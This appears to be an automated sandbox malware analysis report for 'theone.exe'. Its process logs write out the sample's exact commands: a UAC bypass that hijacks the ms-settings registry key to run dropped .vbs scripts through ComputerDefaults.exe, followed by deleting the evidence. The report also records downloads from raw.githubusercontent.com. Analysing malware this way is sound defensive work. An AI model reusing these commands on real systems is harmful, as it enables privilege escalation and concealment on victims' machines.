Malware Analysis Report

2024-12-07 16:24

Sample ID 241113-y4n8assjcq
Target theone.exe
SHA256 8101b388cc8a6a9c948f8d71de9938702b5c25978d804769c8c20fe258adc959
Tags defense_evasion
Score 7/10

Table of Contents

Analysis Overview
MITRE ATT&CK
  Enterprise Matrix V15
Analysis: static1
  Detonation Overview
  Signatures
Analysis: behavioral1
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files
Analysis: behavioral2
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files

Analysis Overview

Score 7/10

SHA256

8101b388cc8a6a9c948f8d71de9938702b5c25978d804769c8c20fe258adc959

Threat Level: Shows suspicious behavior

The file theone.exe was found to show suspicious behavior.

Malicious Activity Summary

defense_evasion

Executes dropped EXE

Checks computer location settings

Legitimate hosting services abused for malware hosting/C2

Indicator Removal: File Deletion

Enumerates physical storage devices

Unsigned PE

Suspicious use of FindShellTrayWindow

Suspicious use of SendNotifyMessage

Modifies registry class

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Checks SCSI registry key(s)

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-13 20:20

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-13 20:20

Reported

2024-11-13 20:25

Platform

win7-20240903-en

Max time kernel

118s

Max time network

119s

Command Line

"C:\Users\Admin\AppData\Local\Temp\theone.exe"

Signatures

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\ms-settings C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\ms-settings\Shell C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\ms-settings\Shell\Open\command C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\ms-settings\Shell\Open\command C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\ms-settings\Shell C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\ms-settings\Shell\Open\command C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\ms-settings\Shell\Open\command C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\ms-settings\Shell\Open C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\ms-settings\Shell C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\ms-settings\Shell\Open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\151417.vbs" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\ms-settings\Shell\Open\command C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\ms-settings C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\ms-settings\Shell\Open C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\ms-settings\Shell\Open\command\DelegateExecute C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\ms-settings C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\ms-settings\Shell\Open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\832544.vbs" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\ms-settings\Shell\Open\command\DelegateExecute C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\ms-settings\Shell\Open\command C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\ms-settings\Shell\Open C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\ms-settings C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\ms-settings\Shell\Open C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\ms-settings\Shell C:\Windows\system32\reg.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2764 wrote to memory of 2776 N/A C:\Users\Admin\AppData\Local\Temp\theone.exe C:\Windows\system32\cmd.exe
PID 2764 wrote to memory of 2776 N/A C:\Users\Admin\AppData\Local\Temp\theone.exe C:\Windows\system32\cmd.exe
PID 2764 wrote to memory of 2776 N/A C:\Users\Admin\AppData\Local\Temp\theone.exe C:\Windows\system32\cmd.exe
PID 2776 wrote to memory of 2536 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2776 wrote to memory of 2536 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2776 wrote to memory of 2536 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2764 wrote to memory of 2964 N/A C:\Users\Admin\AppData\Local\Temp\theone.exe C:\Windows\system32\cmd.exe
PID 2764 wrote to memory of 2964 N/A C:\Users\Admin\AppData\Local\Temp\theone.exe C:\Windows\system32\cmd.exe
PID 2764 wrote to memory of 2964 N/A C:\Users\Admin\AppData\Local\Temp\theone.exe C:\Windows\system32\cmd.exe
PID 2964 wrote to memory of 2020 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2964 wrote to memory of 2020 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2964 wrote to memory of 2020 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2964 wrote to memory of 2836 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2964 wrote to memory of 2836 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2964 wrote to memory of 2836 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2764 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\theone.exe C:\Windows\system32\cmd.exe
PID 2764 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\theone.exe C:\Windows\system32\cmd.exe
PID 2764 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\theone.exe C:\Windows\system32\cmd.exe
PID 2804 wrote to memory of 1592 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\ComputerDefaults.exe
PID 2804 wrote to memory of 1592 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\ComputerDefaults.exe
PID 2804 wrote to memory of 1592 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\ComputerDefaults.exe
PID 2764 wrote to memory of 2644 N/A C:\Users\Admin\AppData\Local\Temp\theone.exe C:\Windows\system32\cmd.exe
PID 2764 wrote to memory of 2644 N/A C:\Users\Admin\AppData\Local\Temp\theone.exe C:\Windows\system32\cmd.exe
PID 2764 wrote to memory of 2644 N/A C:\Users\Admin\AppData\Local\Temp\theone.exe C:\Windows\system32\cmd.exe
PID 2764 wrote to memory of 2528 N/A C:\Users\Admin\AppData\Local\Temp\theone.exe C:\Windows\system32\cmd.exe
PID 2764 wrote to memory of 2528 N/A C:\Users\Admin\AppData\Local\Temp\theone.exe C:\Windows\system32\cmd.exe
PID 2764 wrote to memory of 2528 N/A C:\Users\Admin\AppData\Local\Temp\theone.exe C:\Windows\system32\cmd.exe
PID 2528 wrote to memory of 2572 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2528 wrote to memory of 2572 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2528 wrote to memory of 2572 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2764 wrote to memory of 2516 N/A C:\Users\Admin\AppData\Local\Temp\theone.exe C:\Windows\system32\cmd.exe
PID 2764 wrote to memory of 2516 N/A C:\Users\Admin\AppData\Local\Temp\theone.exe C:\Windows\system32\cmd.exe
PID 2764 wrote to memory of 2516 N/A C:\Users\Admin\AppData\Local\Temp\theone.exe C:\Windows\system32\cmd.exe
PID 2516 wrote to memory of 2620 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2516 wrote to memory of 2620 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2516 wrote to memory of 2620 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2764 wrote to memory of 2912 N/A C:\Users\Admin\AppData\Local\Temp\theone.exe C:\Windows\system32\cmd.exe
PID 2764 wrote to memory of 2912 N/A C:\Users\Admin\AppData\Local\Temp\theone.exe C:\Windows\system32\cmd.exe
PID 2764 wrote to memory of 2912 N/A C:\Users\Admin\AppData\Local\Temp\theone.exe C:\Windows\system32\cmd.exe
PID 2912 wrote to memory of 2828 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2912 wrote to memory of 2828 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2912 wrote to memory of 2828 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2912 wrote to memory of 2748 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2912 wrote to memory of 2748 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2912 wrote to memory of 2748 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2764 wrote to memory of 2824 N/A C:\Users\Admin\AppData\Local\Temp\theone.exe C:\Windows\system32\cmd.exe
PID 2764 wrote to memory of 2824 N/A C:\Users\Admin\AppData\Local\Temp\theone.exe C:\Windows\system32\cmd.exe
PID 2764 wrote to memory of 2824 N/A C:\Users\Admin\AppData\Local\Temp\theone.exe C:\Windows\system32\cmd.exe
PID 2824 wrote to memory of 2904 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\ComputerDefaults.exe
PID 2824 wrote to memory of 2904 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\ComputerDefaults.exe
PID 2824 wrote to memory of 2904 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\ComputerDefaults.exe
PID 2764 wrote to memory of 2924 N/A C:\Users\Admin\AppData\Local\Temp\theone.exe C:\Windows\system32\cmd.exe
PID 2764 wrote to memory of 2924 N/A C:\Users\Admin\AppData\Local\Temp\theone.exe C:\Windows\system32\cmd.exe
PID 2764 wrote to memory of 2924 N/A C:\Users\Admin\AppData\Local\Temp\theone.exe C:\Windows\system32\cmd.exe
PID 2764 wrote to memory of 3044 N/A C:\Users\Admin\AppData\Local\Temp\theone.exe C:\Windows\system32\cmd.exe
PID 2764 wrote to memory of 3044 N/A C:\Users\Admin\AppData\Local\Temp\theone.exe C:\Windows\system32\cmd.exe
PID 2764 wrote to memory of 3044 N/A C:\Users\Admin\AppData\Local\Temp\theone.exe C:\Windows\system32\cmd.exe
PID 3044 wrote to memory of 1564 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3044 wrote to memory of 1564 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3044 wrote to memory of 1564 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe

Processes

C:\Users\Admin\AppData\Local\Temp\theone.exe

"C:\Users\Admin\AppData\Local\Temp\theone.exe"

C:\Windows\system32\cmd.exe

/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f

C:\Windows\system32\reg.exe

reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f

C:\Windows\system32\cmd.exe

/c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\832544.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\832544.vbs" /f

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f

C:\Windows\system32\cmd.exe

/c start /B ComputerDefaults.exe

C:\Windows\system32\ComputerDefaults.exe

ComputerDefaults.exe

C:\Windows\system32\cmd.exe

/c del /f C:\Users\Admin\AppData\Local\Temp\832544.vbs

C:\Windows\system32\cmd.exe

/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f

C:\Windows\system32\reg.exe

reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f

C:\Windows\system32\cmd.exe

/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f

C:\Windows\system32\reg.exe

reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f

C:\Windows\system32\cmd.exe

/c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\151417.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\151417.vbs" /f

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f

C:\Windows\system32\cmd.exe

/c start /B ComputerDefaults.exe

C:\Windows\system32\ComputerDefaults.exe

ComputerDefaults.exe

C:\Windows\system32\cmd.exe

/c del /f C:\Users\Admin\AppData\Local\Temp\151417.vbs

C:\Windows\system32\cmd.exe

/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f

C:\Windows\system32\reg.exe

reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f

Network

Country Destination Domain Proto
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.109.133:443 raw.githubusercontent.com tcp

Files

memory/2764-0-0x00000000002E0000-0x00000000002E1000-memory.dmp

memory/2764-1-0x0000000000300000-0x0000000000301000-memory.dmp

memory/2764-2-0x0000000000340000-0x0000000000341000-memory.dmp

memory/2764-4-0x0000000002220000-0x0000000002221000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\832544.vbs

MD5 8b4ed5c47fdddbeba260ef11cfca88c6
SHA1 868f11f8ed78ebe871f9da182d053f349834b017
SHA256 170226b93ac03ac3178c0429577626add00665e1d71be650a4c46674f6e262a5
SHA512 87e5bcaa143e616c365557f5af73e131a10eb380016633b8c7e38c83b0a216a8f6768cfa0166fad208d47830808444517e57d07d850ff2bd575ca67bad9eabdf

C:\Users\Admin\AppData\Local\Temp\Cab7503.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Temp\Tar7516.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

C:\Users\Admin\AppData\Local\Temp\151417.vbs

MD5 d07a7732bcf62268641e29fb058d9540
SHA1 ec37e3c1602cecc5b13c08c97821b9d59fb65691
SHA256 f625f2b2b653af0f55629216f442a68ee55d9a2a268d6f1b5cb41b4c843f3dca
SHA512 3be09edab7de4ea2e5e2d0ba4c0f7092af1b1618f9dd1f427aa4d8f5cb457a18667f073d255e0e9a170a0b5b7269c0bd7e4b63f77b8366bef42b1a263576bf2c

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-13 20:20

Reported

2024-11-13 20:21

Platform

win10v2004-20241007-en

Max time kernel

48s

Max time network

33s

Command Line

"C:\Users\Admin\AppData\Local\Temp\theone.exe"

Signatures

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation C:\Windows\system32\wscript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation C:\Windows\system32\wscript.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\DxumhqCmD1wGZmjQzSLMX006.exe N/A

Indicator Removal: File Deletion

defense_evasion

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\system32\taskmgr.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName C:\Windows\system32\taskmgr.exe N/A

Modifies registry class

Description Indicator Process Target
Key deleted \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\ms-settings\Shell\Open C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\ms-settings\Shell\Open\command C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\ms-settings\Shell\Open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\190205.vbs" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\ms-settings\Shell C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\ms-settings\Shell\Open\command C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\ms-settings C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\ms-settings\Shell C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\ms-settings\Shell\Open C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\ms-settings\Shell C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\ms-settings C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\ms-settings\Shell\Open\command C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\ms-settings\Shell\Open\command C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\ms-settings C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\ms-settings\Shell\Open C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\ms-settings\Shell\Open\command\DelegateExecute C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\ms-settings C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings C:\Windows\system32\taskmgr.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\ms-settings\Shell\Open\command\DelegateExecute C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\ms-settings\Shell\Open C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\ms-settings\Shell C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\ms-settings\Shell\Open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\90218.vbs" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\ms-settings\Shell\Open\command C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\ms-settings\Shell\Open\command C:\Windows\system32\reg.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A (42 identical rows)

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A (52 identical rows)

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A (51 identical rows)

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1180 wrote to memory of 5108 N/A C:\Users\Admin\AppData\Local\Temp\theone.exe C:\Windows\system32\cmd.exe
PID 1180 wrote to memory of 5108 N/A C:\Users\Admin\AppData\Local\Temp\theone.exe C:\Windows\system32\cmd.exe
PID 5108 wrote to memory of 456 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 5108 wrote to memory of 456 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1180 wrote to memory of 100 N/A C:\Users\Admin\AppData\Local\Temp\theone.exe C:\Windows\system32\cmd.exe
PID 1180 wrote to memory of 100 N/A C:\Users\Admin\AppData\Local\Temp\theone.exe C:\Windows\system32\cmd.exe
PID 100 wrote to memory of 1196 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 100 wrote to memory of 1196 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 100 wrote to memory of 3180 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 100 wrote to memory of 3180 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1180 wrote to memory of 664 N/A C:\Users\Admin\AppData\Local\Temp\theone.exe C:\Windows\system32\cmd.exe
PID 1180 wrote to memory of 664 N/A C:\Users\Admin\AppData\Local\Temp\theone.exe C:\Windows\system32\cmd.exe
PID 664 wrote to memory of 3396 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\ComputerDefaults.exe
PID 664 wrote to memory of 3396 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\ComputerDefaults.exe
PID 3396 wrote to memory of 2328 N/A C:\Windows\system32\ComputerDefaults.exe C:\Windows\system32\wscript.exe
PID 3396 wrote to memory of 2328 N/A C:\Windows\system32\ComputerDefaults.exe C:\Windows\system32\wscript.exe
PID 2328 wrote to memory of 4212 N/A C:\Windows\system32\wscript.exe C:\Windows\System32\cmd.exe
PID 2328 wrote to memory of 4212 N/A C:\Windows\system32\wscript.exe C:\Windows\System32\cmd.exe
PID 1180 wrote to memory of 2176 N/A C:\Users\Admin\AppData\Local\Temp\theone.exe C:\Windows\system32\cmd.exe
PID 1180 wrote to memory of 2176 N/A C:\Users\Admin\AppData\Local\Temp\theone.exe C:\Windows\system32\cmd.exe
PID 1180 wrote to memory of 532 N/A C:\Users\Admin\AppData\Local\Temp\theone.exe C:\Windows\system32\cmd.exe
PID 1180 wrote to memory of 532 N/A C:\Users\Admin\AppData\Local\Temp\theone.exe C:\Windows\system32\cmd.exe
PID 532 wrote to memory of 2852 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 532 wrote to memory of 2852 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1180 wrote to memory of 3180 N/A C:\Users\Admin\AppData\Local\Temp\theone.exe C:\Windows\system32\cmd.exe
PID 1180 wrote to memory of 3180 N/A C:\Users\Admin\AppData\Local\Temp\theone.exe C:\Windows\system32\cmd.exe
PID 3180 wrote to memory of 1476 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3180 wrote to memory of 1476 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1180 wrote to memory of 4008 N/A C:\Users\Admin\AppData\Local\Temp\theone.exe C:\Windows\system32\cmd.exe
PID 1180 wrote to memory of 4008 N/A C:\Users\Admin\AppData\Local\Temp\theone.exe C:\Windows\system32\cmd.exe
PID 4008 wrote to memory of 3428 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4008 wrote to memory of 3428 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4008 wrote to memory of 3396 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4008 wrote to memory of 3396 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1180 wrote to memory of 1760 N/A C:\Users\Admin\AppData\Local\Temp\theone.exe C:\Windows\system32\cmd.exe
PID 1180 wrote to memory of 1760 N/A C:\Users\Admin\AppData\Local\Temp\theone.exe C:\Windows\system32\cmd.exe
PID 1760 wrote to memory of 1212 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\ComputerDefaults.exe
PID 1760 wrote to memory of 1212 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\ComputerDefaults.exe
PID 1212 wrote to memory of 2052 N/A C:\Windows\system32\ComputerDefaults.exe C:\Windows\system32\wscript.exe
PID 1212 wrote to memory of 2052 N/A C:\Windows\system32\ComputerDefaults.exe C:\Windows\system32\wscript.exe
PID 2052 wrote to memory of 4736 N/A C:\Windows\system32\wscript.exe C:\Windows\System32\cmd.exe
PID 2052 wrote to memory of 4736 N/A C:\Windows\system32\wscript.exe C:\Windows\System32\cmd.exe
PID 4736 wrote to memory of 2128 N/A C:\Windows\System32\cmd.exe C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\DxumhqCmD1wGZmjQzSLMX006.exe
PID 4736 wrote to memory of 2128 N/A C:\Windows\System32\cmd.exe C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\DxumhqCmD1wGZmjQzSLMX006.exe
PID 1180 wrote to memory of 1260 N/A C:\Users\Admin\AppData\Local\Temp\theone.exe C:\Windows\system32\cmd.exe
PID 1180 wrote to memory of 1260 N/A C:\Users\Admin\AppData\Local\Temp\theone.exe C:\Windows\system32\cmd.exe
PID 1180 wrote to memory of 3344 N/A C:\Users\Admin\AppData\Local\Temp\theone.exe C:\Windows\system32\cmd.exe
PID 1180 wrote to memory of 3344 N/A C:\Users\Admin\AppData\Local\Temp\theone.exe C:\Windows\system32\cmd.exe
PID 3344 wrote to memory of 5000 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3344 wrote to memory of 5000 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe

Processes

C:\Users\Admin\AppData\Local\Temp\theone.exe

"C:\Users\Admin\AppData\Local\Temp\theone.exe"

C:\Windows\system32\cmd.exe

/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f

C:\Windows\system32\reg.exe

reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f

C:\Windows\system32\cmd.exe

